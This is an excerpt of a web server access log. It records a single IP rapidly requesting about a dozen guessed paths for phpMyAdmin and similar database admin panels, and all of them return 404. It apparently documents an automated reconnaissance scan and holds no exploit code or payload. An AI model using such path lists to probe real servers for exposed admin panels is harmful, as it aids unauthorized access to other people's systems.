35.244.17.211 - - [09/Feb/2025:13:39:30 +0100] "GET /sql/websql/index.php?lang=en HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:30 +0100] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:31 +0100] "GET /db/dbweb/index.php?lang=en HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:31 +0100] "GET /mysql/web/index.php?lang=en HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:31 +0100] "GET /myadmin/index.php?lang=en HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:32 +0100] "GET /phpMyAdmin-5.1.0/index.php?lang=en HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:32 +0100] "GET /phpMyAdmin/index.php?lang=en HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:32 +0100] "GET /db/index.php?lang=en HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:33 +0100] "GET /admin/sqladmin/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:33 +0100] "GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:33 +0100] "GET /db/phpMyAdmin-4/index.php?lang=en HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
